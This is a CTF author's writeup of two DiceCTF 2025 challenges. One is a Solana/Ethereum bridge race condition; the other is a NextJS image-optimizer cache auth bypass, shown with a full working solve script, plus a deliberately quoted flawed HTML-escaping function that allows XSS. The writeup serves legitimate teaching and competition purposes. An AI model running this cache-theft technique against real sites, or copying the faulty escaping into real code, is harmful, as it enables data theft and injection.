---
title: "DiceCTF 2025 Quals Author Writeups"
description: "ft. cursed Solana code and a minor NextJS auth-bypass bug"
date: "2025-03-30"
---

#### DiceCTF 2025 Quals
# Author Writeups
by Arc'blroth

I wrote challenges for DiceCTF for the first time this year, and I had a fun time doing so!
Somehow all three of my challenges managed to come out a lil' cursed - but our curve _is_ optimized for low solves, so it worked out in the end.

Besides the (hopefully obvious) Celeste themeing, a consistent theme from this set of challs was racing the clock on remote. The first solutions
many players thought of - and the first solution I myself implemented - to both `pwn/r2uwu2s-resort` and `misc/golden-bridge` are too slow under
real-world network conditions. I might have been a bit _too_ harsh on the timeouts though...

So here are some thoughts on `misc/golden-bridge` and `web/old-site-b-side`, the two "medium"-difficulty challenges I wrote.

# misc/golden-bridge

> Introducing `$BBL` - a smooth revolution in cross-chain defi technology!
>
> Though we haven't gotten back our audit results yet, we believe in the future of Bubble so much that we've decided to shadow-launch it today!
>
> Grab your 10 free `$FTH`s from the airdrop (while supplies last), and remember to watch out for the wind...
>
> **Please do not deploy this challenge until you have a working solution locally.**

Given that DiceCTF 2025 Quals was sponsored by _both_ Zellic and Ottersec, we definitely needed an obligatory blockchain challenge.
golden-bridge was my answer to that - a challenge involving not one, but _two_ blockchains!

> If you're wondering why there's a giant "do not instance until ready" sign, that's because this
> challenge is configured to use a whopping _2 GB_ of memory on remote. Yikes!
>
> It turns out that `solana-test-validator` physically cannot run with less than 1.5 GB of memory,
> and continues to eat up more memory as more slots get processed. There doesn't seem to be any
> real diversity in (stable) Solana validators as of writing this challenge - I would have happily
> used a less memory-hungry validator if one existed...

Something I felt that I had not seen in recent blockchain challenges was _off-chain_ blockchain code. The real-world industry has built
up a huge amount of supporting "web2" infrastructure that reads and writes to the blockchain. But if [web3isgoinggreat](https://www.web3isgoinggreat.com/)
is any good indication, that "web2" code is no less buggy than the web3 code it supports!

Of course then, the vulnerability in golden-bridge lies in neither the Ethereum smart contract code (which does have some sus code such as not checking
the return value of `transferFrom`) nor in the Solana code. Instead, there are two related vulns in the bridge server code at `bridge/app.py`,
neither of which (I hoped) would be obvious at first glance. To quote my [solve script](https://github.com/dicegang/dicectf-quals-2025-challenges/blob/main/misc/golden-bridge/solve/solve.py):

> The crux of this solve script is a TOCTOU in `toEth` between solana.py reading data at
> the `Finalized` commitment level whilst sending new transactions without waiting for
> that level of commitment.
>
> Both the Ethereum and Solana blockchain calls in app.py return before the corresponding
> transactions have actually been reflected on-chain. This can be abused on the Ethereum
> side by racing `Bridge.withdraw` and `GET /toSol`, and on the Solana side by calling
> `GET /toEth` repeatedly. While the Ethereum-side exploit is feasible locally, it has a
> low chance of success and doesn't really work on remote - geth is just too dang fast!
> Instead, this solve script uses the TOCTOU on the Solana side, taking advantage of the
> slow time-to-finalization with the default solana-test-validator settings.

Coming from Ethereum, my own first attempt to solve this challenge was to frontrun the `Bridge.withdraw` method on the Ethereum side.
It turns out that this is basically impossible to do on remote due to network latency and the fact that `geth --dev` by default mines
as soon as it has a new transaction. Luckily, it turns out that the default settings for `solana.py` are no more secure than the default
settings for `web3.py` - by default, `solana.py` _reads_ data at the `Finalized` committment model but returns from sending a transaction
as soon as the RPC node accepts it. The idea that you can make a RPC call that might get revoked later isn't specific to the blockchain,
but is definitely different from how I usually think about concurrency on the web!

Writing golden-bridge was actually my first time writing Solana - huge huge shoutout to both @Aplet123 and @NotDeGhost for
helping me write and test this challenge! Coming from Ethereum, a lot of Solana's terminology and design seemed rather foreign:
it took me quite some time to get used to the idea of storing data in small PDA "accounts" rather than at some 32-byte offset 
within a single smart-contract's address. There are definitely upsides to Solana's model though - notice how in `app.py` the
bridge pays for the Ethereum transaction but the user pays for the Solana ones!

<small>And now that I know Solana, expect more cursed cross-blockchain challenges from me in the future...</small>

# web/old-site-b-side

> Old Site (Red Moonrise Mix)
>
> Music by CursedCTF 2023 Authors
>
> DiceCTF 2025 Quals

Both LA CTF 2025's [`web/old-site`](https://github.com/uclaacm/lactf-archive/tree/main/2025/web/old-site) and this challenge were inspired by strellic's corCTF 2024 challenge [`web/repayment-pal`](https://github.com/Crusaders-of-Rust/corctf-2024-public-challenge-repo/tree/master/web/repayment-pal). And if the events of last week are anything to go by, NextJS still has more 0-days to give...

While researching the original `web/old-site`, I was looking through the NextJS repo for interesting calls to `fs.readFile` and `fs.writeFile` and found a _really_ sus pair
in [`image-optimizer.ts`](https://github.com/vercel/next.js/blob/9a1cd356dbafbfcf23d1b9ec05f772f766d05580/packages/next/src/server/image-optimizer.ts#L328). It turns out
that these calls aren't actually vulnerable though - NextJS "sanitizes" the components of the cache filename using base64url encoding, so this can't be used to get
arbitrary file read. But if we dare to look a little bit up the call stack, we start to have some questions.

`imageOptimizer` is invoked across two blocks of code in `next-server.ts`: at [`handleNextImageRequest`](https://github.com/vercel/next.js/blob/9a1cd356dbafbfcf23d1b9ec05f772f766d05580/packages/next/src/server/next-server.ts#L812) and [`imageOptimizer`](https://github.com/vercel/next.js/blob/9a1cd356dbafbfcf23d1b9ec05f772f766d05580/packages/next/src/server/next-server.ts#L591) (Vercel this is terrible variable naming). Crucially, neither of these functions care about the existence
of authentication middleware - they will make an "internal" request with the same cookies as the current request and cache the response as long as it
succeeds. (Note that the image optimizer is not run in "minimal mode", Vercel's term for their serverless thing.) If you can convince someone to look
at what is seemingly their own image, you then have 60 seconds to steal it from the same URL, as long as you use [the same `Accept:` header](https://github.com/vercel/next.js/blob/9a1cd356dbafbfcf23d1b9ec05f772f766d05580/packages/next/src/server/image-optimizer.ts#L277)!

Thus, here's the solve script for this challenge in its entirety (run with `deno --allow-net`):

```js
const REMOTE = "http://localhost:3000"
const CACHE_URL = `/_next/image?url=/api/me/badge&w=96&h=96&q=100`

const sleep = ms => new Promise(r => setTimeout(r, ms))

console.log(
  await (
    await fetch(`${REMOTE}/api/report`, {
      method: "POST",
      body: `HACKER+IP=${encodeURIComponent(`http://localhost:3000${CACHE_URL}`)}`,
      headers: [["Content-Type", "application/x-www-form-urlencoded"]]
    })
  ).text()
)

await sleep(6_000)

const gif = new TextDecoder("ascii", { fatal: false }).decode(
  await (
    await fetch(`${REMOTE}${CACHE_URL}`, {
        headers: [["Accept", "image/webp"]]
    })
  ).arrayBuffer()
)
console.log(gif.substring(gif.indexOf("dice{"), gif.length))
```

I'm not sure if this counts as a NextJS 0-day or not, since it is decently contrived.
But it is an interesting auth bypass in real-world software, and maybe a good reminder to check _every_ endpoint in your app for vulnerabilties - not just the ones you've defined yourself :D

Also there was an [unintended XSS](https://github.com/dicegang/dicectf-quals-2025-challenges/blob/main/web/old-site-b-side/utils.mjs#L2) in both this challenge and the original `web/old-site` lol:

```js
function escapeHtml(x) {
  return x.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
}
```

Luckily, it seems that my overcooked CSP prevented any cheese solves from this. Defense in depth go brr!
